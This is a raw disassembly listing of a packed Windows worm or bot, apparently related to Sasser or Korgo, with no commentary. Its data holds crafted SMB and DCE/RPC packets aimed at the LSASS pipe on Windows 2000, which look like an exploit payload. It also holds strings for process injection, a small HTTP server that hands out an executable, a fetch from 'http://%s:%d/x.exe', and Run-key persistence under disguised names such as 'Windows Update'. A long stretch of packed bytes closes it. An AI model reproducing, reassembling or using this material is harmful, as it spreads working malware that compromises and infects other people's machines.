dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_314345A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_314319BC+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31434634 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_314346E0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_314347C0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_314319BC+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31434824 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31434890 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31434934 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_314349B4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31434A48 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31434AB4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31434B28 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31434BE6 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31434C20 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_314319BC+41B�o
; sub_314319BC+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31434C98: ; DATA XREF: sub_314319BC+44A�o
jmp short loc_31434CA0
; ---------------------------------------------------------------------------
jmp short loc_31434CA2
; ---------------------------------------------------------------------------
align 10h
loc_31434CA0: ; CODE XREF: UPX0:loc_31434C98�j
; DATA XREF: sub_314319BC+5C�o
pop esp
pop esp
loc_31434CA2: ; CODE XREF: UPX0:31434C9A�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31434CAC dd 1CEC8166h dword_31434CB0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31431F23+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31431F23+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31431F23+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31431F23+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31431F23+8�o
; sub_3143256D+13A�o
align 4
aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31431FAB:loc_31432090�o
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31431FAB+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31431FAB:loc_31431FF2�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31431FAB+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31431FAB+18�o
align 4
dword_31434D64 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31432239+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_31432239+3D�o
aUterm20 db 'uterm20',0 ; DATA XREF: UPX0:3143250C�o
; sub_3143256D+148�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:314324F7�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_3143256D+141�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3143256D+133�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_3143256D+12C�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3143256D+11F�o
align 10h
aU20x db 'u20x',0 ; DATA XREF: sub_3143256D+CB�o
align 4
aU20 db 'u20',0 ; DATA XREF: sub_3143256D+C4�o
aU19 db 'u19',0 ; DATA XREF: sub_3143256D+BD�o
aU18 db 'u18',0 ; DATA XREF: sub_3143256D+B6�o
aU17 db 'u17',0 ; DATA XREF: sub_3143256D+AF�o
aU16 db 'u16',0 ; DATA XREF: sub_3143256D+A8�o
aU15 db 'u15',0 ; DATA XREF: sub_3143256D+A1�o
aU14 db 'u14',0 ; DATA XREF: sub_3143256D+9A�o
aU13i db 'u13i',0 ; DATA XREF: sub_3143256D+93�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_3143256D+8C�o
aU12 db 'u12',0 ; DATA XREF: sub_3143256D+85�o
aU11 db 'u11',0 ; DATA XREF: sub_3143256D+7E�o
aU10 db 'u10',0 ; DATA XREF: sub_3143256D+77�o
aU9 db 'u9',0 ; DATA XREF: sub_3143256D+70�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_3143256D+69�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_3143256D+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_3143256D+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_3143256D+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_3143256D+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3143256D+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_3143256D+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3143256D+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_3143256D+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3143256D+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_3143256D+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_314328D7+2D�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3143237F+23�o
; sub_31432BAD+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_3143237F+1C�o
; sub_31432C62+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_31431782+4F�o
; sub_31432D2E+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_1 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31432D2E+32�o
aClient db 'Client',0 ; DATA XREF: sub_31432D2E+BC�o
; sub_31432D2E+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31432D2E+37�o
; sub_31432D2E+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31432BAD+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31432BAD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31432BAD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31432BAD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31432BAD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31432BAD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31432BAD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31432BAD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31432BAD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31432BAD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31432BAD+F�o
align 4
a1: ; DATA XREF: sub_31432D2E+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31435028 dd 0 ; sub_3143237F+80�w
dword_3143502C dd 0 ; sub_3143185D+53�o ...
dword_31435030 dd 0 ; sub_31432239:loc_314322E7�r ...
dword_31435034 dd 70h ; UPX0:31432517�w ...
dword_31435038 dd 0 ; sub_3143256D+DC�w
dword_3143503C dd 0 ; sub_314328D7+20�r
dword_31435040 dd 31430000h ; UPX0:314324FC�w
dword_31435044 dd 0 ; sub_3143185D+4A�o ...
dword_31435048 dd 0 ; UPX0:31432974�w ...
dword_3143504C dd 0 ; sub_31432728+41�r ...
dword_31435050 dd 0 ; sub_31432D2E+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31436000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31436000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31437C81�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 4C746547h
dd 45747361h, 726F7272h, 72570100h, 46657469h, 656C69h
dd 6F6C4301h, 61486573h, 656C646Eh, 72430100h, 65746165h
dd 656C6946h, 6C010041h, 6C727473h, 416E65h, 74736C01h
dd 74616372h, 47010041h, 79537465h, 6D657473h, 65726944h
dd 726F7463h, 1004179h, 65746E49h, 636F6C72h, 4564656Bh
dd 61686378h, 65676Eh, 74654701h, 61636F4Ch, 6E49656Ch
dd 416F66h, 656C5301h, 1007065h, 7274736Ch, 6E797063h
dd 47010041h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h
dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h
dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h
dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh
dd 47010041h, 69547465h, 6F436B63h, 746E75h, 65724301h
dd 4D657461h, 78657475h, 43010041h, 74616572h, 72685465h
dd 646165h, 65724301h, 50657461h, 65636F72h, 417373h, 74655301h
dd 6E657645h, 4F010074h, 456E6570h, 746E6576h, 45010041h
dd 54746978h, 61657268h, 49010064h, 7265746Eh, 6B636F6Ch
dd 6E496465h, 6D657263h, 746E65h, 61655201h, 6C694664h
dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 74697845h
dd 636F7250h, 737365h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 6F746101h, 73010069h, 68637274h
dd 0E9000072h, 14000000h, 1000001h, 646E6946h, 646E6957h
dd 41776Fh, 74654701h, 65726F46h, 756F7267h, 6957646Eh
dd 776F646Eh, 65470100h, 6E695774h, 54776F64h, 61657268h
dd 6F725064h, 73736563h, 1006449h, 72707377h, 66746E69h
dd 0F4000041h, 28000000h, 1000001h, 65746E49h, 74656E72h
dd 6E65704Fh, 416C7255h, 6E490100h, 6E726574h, 704F7465h
dd 416E65h, 746E4901h, 656E7265h, 6F6C4374h, 61486573h
dd 656C646Eh, 6E490100h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h
dd 61655274h, 6C694664h, 65h, 40000001h, 0FF000001h, 2FF0073h
dd 0DFF00h, 0FF0001FFh, 6FFF0039h, 34FF00h, 0FF0017FFh
dd 9FF000Ch, 4FF00h, 0FF0013FFh, 16FF0010h, 3FF00h, 0
dd 455000h, 2014C00h, 0E07ED200h, 40h, 0
dd 0F00E000h, 6010B01h, 280000h, 120000h, 0
dd 24EF00h, 100000h, 400000h, 43000000h, 100031h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 2F0400h, 8C00h, 14h dup(0)
dd 100000h, 18000h, 6 dup(0)
dd 65742E00h, 7478h, 263200h, 100000h, 280000h, 40000h
dd 3 dup(0)
dd 4002000h, 61642EE0h, 6174h, 105400h, 400000h, 120000h
dd 2C0000h, 3 dup(0)
dd 4000h, 5000C0h, 311000h, 54C900h, 57965900h, 6849FAFAh
dd 0B7000E29h, 844F4CCFh, 0A2623FE0h, 0DC24106Ah, 0DED1BA53h
dd 44810B66h, 5F0DC766h, 0B73BD68h, 0E4D6E6CDh, 0DE196664h
dd 164C2621h, 0FC5644DEh, 31E07589h, 51B36968h, 3EA2E2Eh
dd 0C8BF9C37h, 0E89C3A7h, 6CD8E087h, 770D7C13h, 0A8433716h
dd 18D3B345h, 9B6BDB07h, 0F88C0D0Bh, 49190640h, 73F27046h
dd 6A9821CDh, 4634332Eh, 17273C8h, 37E0DE64h, 3010CCDFh
dd 8C0F4608h, 0D0BD8027h, 740B89E5h, 0C5803126h, 43089D01h
dd 0D0EECD70h, 0BC3C0007h, 115690F0h, 0B66061EEh, 0AA425F0Ch
dd 0C1FF15Ch, 11784396h, 0C9EC0CB3h, 9705C87Ch, 0F8786E0Ah
dd 894BE6A1h, 25620546h, 0DA46568h, 0AEC28B6Dh, 92A2043Bh
dd 3CF01Ch, 27BE83Bh, 100BC86Ah, 4824A32Eh, 86024A19h
dd 0A0CF6043h, 2163390h, 0B9AEBB03h, 0A73D7D95h, 769F6801h
dd 664A48E6h, 3A21B736h, 1B5AB7CCh, 3DB9A4E0h, 6A7684E4h
dd 96F42A70h, 364719B4h, 5EC86007h, 7A97640Ah, 39F0D92Eh
dd 0A2280084h, 3C4B283Fh, 0CDCB59B2h, 98B9B26Ch, 23BDEBE2h
dd 0DC0167A7h, 0C77E500Fh, 0BE1F218Dh, 0AC68F60Eh, 0D328C00Dh
dd 0C676E6C9h, 0E57A08A1h, 0DB0C7A04h, 0C8611488h, 2DC54C20h
dd 6C84BF34h, 2EDB1CD6h, 0B698DE40h, 4192FC84h, 40BCDE44h
dd 0C27190D6h, 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh
dd 67E9ACF9h, 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h
dd 1CF25B07h, 96F41276h, 0A19DE9C3h, 4F0CEF1Bh, 7BC87C6Ah
dd 64B1E3C3h, 0C9BE4934h, 991DD27Bh, 90E154E4h, 0B42DE924h
dd 48B9B999h, 0EDCF7881h, 0C80A5848h, 0CF88286h, 6633F415h
dd 2665846h, 7808747Ah, 41BA9D5Fh, 5FF4C65Eh, 7D1C0F8Ah
dd 9C1369E0h, 0AC204D0Ch, 0C0A8357Fh, 5F68683h, 572448F8h
dd 565FC937h, 5A7457D8h, 74F80E14h, 0B8C8684Bh, 0CA8950BAh
dd 0E83D7496h, 4B4B3F6Ch, 0A44120C9h, 0FFC55FFh, 0F6B9ADE8h
dd 50E4B92Ch, 0E9628ACh, 0CCDA6AD9h, 0F81B02F0h, 0E48C0009h
dd 81DB40ACh, 42F47558h, 29C587EEh, 8B181F13h, 6701400Dh
dd 0BFEEFFB6h, 3C418B2Fh, 68C10357h, 488B9758h, 50788B34h
dd 0A0F44D89h, 8D759CB8h, 1BDBD84Bh, 0BEF09153h, 0B002F0ACh
dd 4751EB01h, 0ED74EC12h, 1AC55A0Ch, 0D7240Dh, 9300CA82h
dd 18090E6Dh, 0B22ECDEh, 0F84DAFDFh, 1C185051h, 412A6897h
dd 8958D8ABh, 60FE5DB4h, 0CAD2C68Bh, 1C346B03h, 0B7680630h
dd 59AB1976h, 0BE7DF055h, 135BAB62h, 0F03E45E6h, 0DC50EF51h
dd 34EC5F13h, 34A110B0h, 0FFFAD6BDh, 172783C4h, 5577D06Ah
dd 74C73BECh, 805F8C78h, 1BEB1605h, 684D1868h, 3959E010h
dd 0E5CC857h, 8D405FCh, 0F8041D74h, 0FC58EFA2h, 4251511Dh
dd 2F0DC32Bh, 69310F60h, 41B60D10h, 0BC258964h, 22B1AFDDh
dd 138575D6h, 590FECB2h, 5D33DB2Dh, 6AF9C267h, 803CC0B6h
dd 624EE90Ch, 50A85089h, 0C42C507Dh, 0AC297488h, 8020195Dh
dd 0B3F8B55Bh, 7C8B5743h, 57D21424h, 67FFF7Eh, 1A87178Bh
dd 8861C280h, 3B461E14h, 80E97CF7h, 0E030E036h, 4A003B24h
dd 86444954h, 2EDB78CEh, 57AC5A5Fh, 2166DB56h, 303A5DCh
dd 0F0DC732Fh, 25B81950h, 648D62h, 0E377ACAAh, 954D04F0h
dd 49F408C8h, 0DBA32668h, 0F00CFADAh, 3408C7FFh, 0DA65B27Bh
dd 2E2ACC34h, 0A0A7550h, 666B5CE8h, 1A20BC54h, 0B7ED5818h
dd 7C64F85h, 13B7FB8h, 0C408B14h, 2C01008Bh, 86F8E76h
dd 24448D51h, 1134215Fh, 9A7C2D3h, 245903DBh, 0BBD01507h
dd 7743A19Eh, 2FCC2007h, 3233E433h, 0F8C83FDBh, 8510E7C1h
dd 0A05B60Bh, 200CD86h, 0CF125D8Bh, 1C0BABECh, 7FC20099h
dd 7B55C653h, 139E2416h, 0C0934521h, 25AAECF0h, 6E5D868h
dd 5B4ECF20h, 17B5ADE7h, 675641F0h, 35953336h, 0A33D986Ch
dd 8CC6EC66h, 503044B7h, 0B370FE47h, 4D80C581h, 0EBDA14A5h
dd 54B3174Eh, 0A134007Ch, 37FBAE33h, 7900B9F0h, 0C13BC72Bh
dd 0C18B0272h, 0FC292BE1h, 0A1DDBDDDh, 0C7031828h, 1374AC23h
dd 1172233Dh, 4678516Ah, 40F8784Bh, 0EC13C4EBh, 0E1B462D9h
dd 0D8117750h, 0DC9A941Eh, 68159E4Dh, 68030B68h, 9B6B3A64h
dd 3A3C97C5h, 8F535453h, 52CC7D18h, 9824D483h, 0C423347Dh
dd 30DE04C2h, 4FB2F457h, 0B1B1087Dh, 0E868C3D0h, 168EE4Eh
dd 0B8BAAFDEh, 89FF6806h, 0ED04841Dh, 0D4244BA9h, 539100F2h
dd 9886937Bh, 3A01026Dh, 1CD680A6h, 0FD775A8Dh, 0E741A4Dh
dd 2F6946CFh, 0CA3E0CDh, 0ACEF4BC2h, 0A4FEA365h, 565153FCh
dd 635B3A5Bh, 68DC3A86h, 87DF2656h, 5EF9119Bh, 10C25C19h
dd 1B4D424Ch, 56C05E05h, 9DFD0C4Bh, 89E8D2F4h, 50DEC5Dh
dd 1FFF25FFh, 0BEEC1BFDh, 0A3C33A04h, 0E774433Ch, 84CC8A1Fh
dd 50DF74C9h, 937ABE3h, 5F42EA6Bh, 4C85A544h, 646530B7h
dd 0B97B480Ch, 5F7D35FBh, 1FD814F8h, 68B1114Ch, 0D9C22239h
dd 9111D5Bh, 53E2EB62h, 0CC455FCFh, 4384B982h, 0B6700190h
dd 0AE3AF759h, 0D6B03340h, 36023E11h, 0E687A60Fh, 0B8803AD6h
dd 3044E468h, 0A3AB1B63h, 7C74E040h, 4AB27633h, 34A37B69h
dd 767B781Ah, 0B73D6182h, 29E44552h, 43041F0Fh, 1BB37D9Ch
dd 682A1DA9h, 0A713256Dh, 13ED7ED1h, 1586EB0Dh, 35699969h
dd 0AC188438h, 397044C6h, 4B104D40h, 0D290E409h, 3372396Ch
dd 88454ADCh, 8C06EF9Ch, 238C9094h, 941C8E47h, 9C7C9884h
dd 0E472A074h, 0A46C91C8h, 0AC5CA864h, 1C8E4754h, 0B450B039h
dd 0BC48B84Ch, 91C8E444h, 0C440C023h, 8E34C83Ch, 0CC72391Ch
dd 0D42CD030h, 0C724D828h, 0DC472391h, 0E41CE020h, 76CD9018h
dd 9C10C780h, 0A36CE145h, 7ADB72F1h, 2FCBEECh, 730A8384h
dd 0B806ED12h, 4F8442B4h, 59B8885h, 9B0CFF59h, 0EBD9C870h
dd 0B00E1AE8h, 0E0F91A6Ah, 95391A17h, 8683974h, 32ACB94Eh
dd 45936C72h, 0F8064E00h, 21760C4Dh, 0A8F07261h, 49BF140Ah
dd 79B7676Eh, 0EF15237Fh, 0F1185D0Ah, 33C822E0h, 559C5029h
dd 0D747E90Fh, 18B4146Dh, 0AA138806h, 1412E3EBh, 17A7049Eh
dd 0DBA3BD23h, 63123818h, 7FA48071h, 8FD5BDh, 458A4FBBh
dd 0FF77530Bh, 83DBDB32h, 3A518701h, 5D3831D9h, 0E93125DBh
dd 5D88E291h, 0B8099D0Bh, 80CF1559h, 4CB72CDFh, 0F1F7D233h
dd 0FE9BD103h, 0CB65EBC3h, 0FFFB80F8h, 60C6BD72h, 1C0F5674h
dd 7A303876h, 41586667h, 4F870ADBh, 40A7F05h, 3B6B3618h
dd 9A0B0918h, 17692573h, 0F758BECh, 37272804h, 0AC01D0C8h
dd 8147822Bh, 6CE27695h, 4C9FA16Ah, 7A595D5Eh, 2CD74CAEh
dd 0F0A26472h, 7832DB7Ch, 0FD720A2Eh, 35F8FF04h, 0FEF42Fh
dd 0F7887F3Ch, 0B18BB06Ah, 4D8B6C3h, 0A9DCFD3Bh, 0EC04A23Eh
dd 579F6764h, 9B572F9Dh, 4B3DB21Ch, 1359F8E0h, 4A36FF8Ah
dd 0B2C54ADCh, 68FCEE75h, 0C8EC3C27h, 0BDD3A21Ah, 70849ED3h
dd 1C180961h, 4C5AA537h, 52AD630h, 508FCC4Fh, 18B6BD78h
dd 0FC68BAE3h, 67B7C156h, 0B3C443Eh, 0A468B003h, 0DCB71E4Eh
dd 11104580h, 6842E231h, 12F7D70h, 0B80C613h, 0C0B343DFh
dd 5579BB02h, 8E579756h, 663C344h, 4D1DE6BCh, 30E26CA4h
dd 0FD1F0C43h, 53146CF4h, 483776CDh, 20BF66Bh, 4838506Ah
dd 76D9A65Dh, 0D005C7DFh, 1974F896h, 9D01480Bh, 0BDDCCE60h
dd 141A055Eh
dd 0E103D851h, 1806DE27h, 0C9FB81D3h, 0D6530D74h, 0B6844203h
dd 1D1053C7h, 0DB04C3Bh, 1824C37Dh, 0ED85ED3Ch, 10B1117Eh
dd 0EED82C28h, 144DEDB0h, 0A40598EFh, 200DF2EBh, 75324B74h
dd 6DDEB65h, 0EB45C0B0h, 27D53F68h, 60B11BA2h, 0B5150C64h
dd 43A5106Fh, 14083BE8h, 6CD7513Bh, 18D4C859h, 18430856h
dd 31883EF6h, 3D566C2Eh, 0A52ADC74h, 4DE702DBh, 2050DF61h
dd 4E05B110h, 3081896h, 6B0F5EB6h, 557E2CD1h, 0FAEDC68Bh
dd 6764C82Eh, 532C56ADh, 67005556h, 270C422Dh, 0C520A31h
dd 2C81C931h, 0C45D0C04h, 0BB679061h, 0E0530128h, 0F40B89FBh
dd 8E3D4E2Dh, 1E3C4094h, 1F10365Ch, 794E7A1Ch, 0F8E510F7h
dd 0EB778B64h, 687AA239h, 17D86635h, 0B13B3Bh, 2005C710h
dd 0A24F7789h, 7DF21E99h, 1E748D47h, 0BD02609Bh, 0AE48FCA2h
dd 0FE8194DCh, 0B5FF1C2Ah, 0FFF51EFh, 0E6CCCD1Fh, 60085282h
dd 0D5CCE50h, 76EC4687h, 3CB787BDh, 89D0D036h, 0B457E273h
dd 23914FECh, 6D846C7h, 0B4D8C0D4h, 0C8E47239h, 0A0E0ACDCh
dd 7CE888E4h, 1C8E4730h, 50F060ECh, 45F340F4h, 86B764D3h
dd 0BE70BF0Bh, 8B858E85h, 188B8A05h, 0A0406C49h, 8357C491h
dd 0F4D50E17h, 1D101B05h, 8340F10Bh, 326A8452h, 0A775BFAFh
dd 4D84628Ah, 74767830h, 5D74B409h, 653FA8CCh, 0A5636A88h
dd 0FE0B84C8h, 28A19C09h, 8303E083h, 866305C0h, 5BD3CAA3h
dd 51CFC42Ah, 10B9186Eh, 661C3D1Eh, 0D6CE9DEEh, 3F140E26h
